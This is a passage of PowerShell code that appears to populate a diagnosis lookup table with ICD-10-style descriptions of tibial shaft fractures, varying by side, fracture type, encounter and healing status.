= $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right tibia","Unspecified fracture of shaft of right tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right tibia","Unspecified fracture of shaft of right tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right tibia","Unspecified fracture of shaft of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right tibia","Unspecified fracture of shaft of right tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right tibia","Unspecified fracture of shaft of right tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right tibia","Unspecified fracture of shaft of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right tibia","Unspecified fracture of shaft of right tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right tibia","Unspecified fracture of shaft of right tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right tibia","Unspecified fracture of shaft of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right tibia","Unspecified fracture of shaft of right tibia, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left tibia","Unspecified fracture of shaft of left tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left tibia","Unspecified fracture of shaft of left tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left tibia","Unspecified fracture of shaft of left tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left tibia","Unspecified fracture of shaft of left tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left tibia","Unspecified fracture of shaft of left tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left tibia","Unspecified fracture of shaft of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left tibia","Unspecified fracture of shaft of left tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left tibia","Unspecified fracture of shaft of left tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left tibia","Unspecified fracture of shaft of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left tibia","Unspecified fracture of shaft of left tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left tibia","Unspecified fracture of shaft of left tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left tibia","Unspecified fracture of shaft of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left tibia","Unspecified fracture of shaft of left tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left tibia","Unspecified fracture of shaft of left tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left tibia","Unspecified fracture of shaft of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left tibia","Unspecified fracture of shaft of left tibia, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified tibia","Unspecified fracture of shaft of unspecified tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified tibia","Unspecified fracture of shaft of unspecified tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified tibia","Unspecified fracture of shaft of unspecified tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified tibia","Unspecified fracture of shaft of unspecified tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified tibia","Unspecified fracture of shaft of unspecified tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified tibia","Unspecified fracture of shaft of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified tibia","Unspecified fracture of shaft of unspecified tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified tibia","Unspecified fracture of shaft of unspecified tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified tibia","Unspecified fracture of shaft of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified tibia","Unspecified fracture of shaft of unspecified tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified tibia","Unspecified fracture of shaft of unspecified tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified tibia","Unspecified fracture of shaft of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified tibia","Unspecified fracture of shaft of unspecified tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified tibia","Unspecified fracture of shaft of unspecified tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified tibia","Unspecified fracture of shaft of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified tibia","Unspecified fracture of shaft of unspecified tibia, sequela") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right tibia","Displaced transverse fracture of shaft of right tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right tibia","Displaced transverse fracture of shaft of right tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right tibia","Displaced transverse fracture of shaft of right tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right tibia","Displaced transverse fracture of shaft of right tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right tibia","Displaced transverse fracture of shaft of right tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right tibia","Displaced transverse fracture of shaft of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right tibia","Displaced transverse fracture of shaft of right tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right tibia","Displaced transverse fracture of shaft of right tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right tibia","Displaced transverse fracture of shaft of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right tibia","Displaced transverse fracture of shaft of right tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right tibia","Displaced transverse fracture of shaft of right tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right tibia","Displaced transverse fracture of shaft of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right tibia","Displaced transverse fracture of shaft of right tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right tibia","Displaced transverse fracture of shaft of right tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right tibia","Displaced transverse fracture of shaft of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right tibia","Displaced transverse fracture of shaft of right tibia, sequela") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left tibia","Displaced transverse fracture of shaft of left tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left tibia","Displaced transverse fracture of shaft of left tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left tibia","Displaced transverse fracture of shaft of left tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left tibia","Displaced transverse fracture of shaft of left tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left tibia","Displaced transverse fracture of shaft of left tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left tibia","Displaced transverse fracture of shaft of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left tibia","Displaced transverse fracture of shaft of left tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left tibia","Displaced transverse fracture of shaft of left tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left tibia","Displaced transverse fracture of shaft of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left tibia","Displaced transverse fracture of shaft of left tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left tibia","Displaced transverse fracture of shaft of left tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left tibia","Displaced transverse fracture of shaft of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left tibia","Displaced transverse fracture of shaft of left tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left tibia","Displaced transverse fracture of shaft of left tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left tibia","Displaced transverse fracture of shaft of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left tibia","Displaced transverse fracture of shaft of left tibia, sequela") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified tibia","Displaced transverse fracture of shaft of unspecified tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified tibia","Displaced transverse fracture of shaft of unspecified tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified tibia","Displaced transverse fracture of shaft of unspecified tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified tibia","Displaced transverse fracture of shaft of unspecified tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified tibia","Displaced transverse fracture of shaft of unspecified tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified tibia","Displaced transverse fracture of shaft of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified tibia","Displaced transverse fracture of shaft of unspecified tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified tibia","Displaced transverse fracture of shaft of unspecified tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified tibia","Displaced transverse fracture of shaft of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified tibia","Displaced transverse fracture of shaft of unspecified tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified tibia","Displaced transverse fracture of shaft of unspecified tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified tibia","Displaced transverse fracture of shaft of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified tibia","Displaced transverse fracture of shaft of unspecified tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified tibia","Displaced transverse fracture of shaft of unspecified tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified tibia","Displaced transverse fracture of shaft of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified tibia","Displaced transverse fracture of shaft of unspecified tibia, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right tibia","Nondisplaced transverse fracture of shaft of right tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right tibia","Nondisplaced transverse fracture of shaft of right tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right tibia","Nondisplaced transverse fracture of shaft of right tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right tibia","Nondisplaced transverse fracture of shaft of right tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right tibia","Nondisplaced transverse fracture of shaft of right tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right tibia","Nondisplaced transverse fracture of shaft of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right tibia","Nondisplaced transverse fracture of shaft of right tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right tibia","Nondisplaced transverse fracture of shaft of right tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right tibia","Nondisplaced transverse fracture of shaft of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right tibia","Nondisplaced transverse fracture of shaft of right tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right tibia","Nondisplaced transverse fracture of shaft of right tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right tibia","Nondisplaced transverse fracture of shaft of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right tibia","Nondisplaced transverse fracture of shaft of right tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right tibia","Nondisplaced transverse fracture of shaft of right tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right tibia","Nondisplaced transverse fracture of shaft of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right tibia","Nondisplaced transverse fracture of shaft of right tibia, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left tibia","Nondisplaced transverse fracture of shaft of left tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left tibia","Nondisplaced transverse fracture of shaft of left tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left tibia","Nondisplaced transverse fracture of shaft of left tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left tibia","Nondisplaced transverse fracture of shaft of left tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left tibia","Nondisplaced transverse fracture of shaft of left tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left tibia","Nondisplaced transverse fracture of shaft of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left tibia","Nondisplaced transverse fracture of shaft of left tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left tibia","Nondisplaced transverse fracture of shaft of left tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left tibia","Nondisplaced transverse fracture of shaft of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left tibia","Nondisplaced transverse fracture of shaft of left tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left tibia","Nondisplaced transverse fracture of shaft of left tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left tibia","Nondisplaced transverse fracture of shaft of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left tibia","Nondisplaced transverse fracture of shaft of left tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left tibia","Nondisplaced transverse fracture of shaft of left tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left tibia","Nondisplaced transverse fracture of shaft of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left tibia","Nondisplaced transverse fracture of shaft of left tibia, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified tibia","Nondisplaced transverse fracture of shaft of unspecified tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified tibia","Nondisplaced transverse fracture of shaft of unspecified tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified tibia","Nondisplaced transverse fracture of shaft of unspecified tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified tibia","Nondisplaced transverse fracture of shaft of unspecified tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified tibia","Nondisplaced transverse fracture of shaft of unspecified tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified tibia","Nondisplaced transverse fracture of shaft of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified tibia","Nondisplaced transverse fracture of shaft of unspecified tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified tibia","Nondisplaced transverse fracture of shaft of unspecified tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified tibia","Nondisplaced transverse fracture of shaft of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified tibia","Nondisplaced transverse fracture of shaft of unspecified tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified tibia","Nondisplaced transverse fracture of shaft of unspecified tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified tibia","Nondisplaced transverse fracture of shaft of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified tibia","Nondisplaced transverse fracture of shaft of unspecified tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified tibia","Nondisplaced transverse fracture of shaft of unspecified tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified tibia","Nondisplaced transverse fracture of shaft of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified tibia","Nondisplaced transverse fracture of shaft of unspecified tibia, sequela") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right tibia","Displaced oblique fracture of shaft of right tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right tibia","Displaced oblique fracture of shaft of right tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right tibia","Displaced oblique fracture of shaft of right tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right tibia","Displaced oblique fracture of shaft of right tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right tibia","Displaced oblique fracture of shaft of right tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right tibia","Displaced oblique fracture of shaft of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right tibia","Displaced oblique fracture of shaft of right tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right tibia","Displaced oblique fracture of shaft of right tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right tibia","Displaced oblique fracture of shaft of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right tibia","Displaced oblique fracture of shaft of right tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right tibia","Displaced oblique fracture of shaft of right tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right tibia","Displaced oblique fracture of shaft of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right tibia","Displaced oblique fracture of shaft of right tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right tibia","Displaced oblique fracture of shaft of right tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right tibia","Displaced oblique fracture of shaft of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right tibia","Displaced oblique fracture of shaft of right tibia, sequela") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left tibia","Displaced oblique fracture of shaft of left tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left tibia","Displaced oblique fracture of shaft of left tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left tibia","Displaced oblique fracture of shaft of left tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left tibia","Displaced oblique fracture of shaft of left tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left tibia","Displaced oblique fracture of shaft of left tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left tibia","Displaced oblique fracture of shaft of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left tibia","Displaced oblique fracture of shaft of left tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left tibia","Displaced oblique fracture of shaft of left tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left tibia","Displaced oblique fracture of shaft of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left tibia","Displaced oblique fracture of shaft of left tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left tibia","Displaced oblique fracture of shaft of left tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left tibia","Displaced oblique fracture of shaft of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left tibia","Displaced oblique fracture of shaft of left tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left tibia","Displaced oblique fracture of shaft of left tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left tibia","Displaced oblique fracture of shaft of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left tibia","Displaced oblique fracture of shaft of left tibia, sequela") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified tibia","Displaced oblique fracture of shaft of unspecified tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified tibia","Displaced oblique fracture of shaft of unspecified tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified tibia","Displaced oblique fracture of shaft of unspecified tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified tibia","Displaced oblique fracture of shaft of unspecified tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified tibia","Displaced oblique fracture of shaft of unspecified tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified tibia","Displaced oblique fracture of shaft of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified tibia","Displaced oblique fracture of shaft of 